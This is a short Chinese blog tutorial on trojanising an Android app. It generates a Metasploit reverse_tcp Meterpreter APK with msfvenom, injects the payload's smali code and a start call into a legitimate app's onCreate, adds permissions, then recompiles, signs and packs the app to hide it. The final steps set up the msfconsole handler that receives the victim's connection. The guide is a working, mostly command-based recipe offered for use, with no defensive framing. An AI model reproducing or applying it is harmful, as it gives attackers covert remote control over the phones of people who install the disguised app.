参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译 //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名 //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳 //百度"加壳工具"
10,service postgresql start //启动数据库
11,msfconsole //启动msf
12,use exploit/multi/handler //加载攻击模块
13,set payload android/meterpreter/reverse_tcp //选择要使用的Payload
14,show options //查看需要设置的
payload注入android APK教程
最新推荐文章于 2024-04-10 09:36:34 发布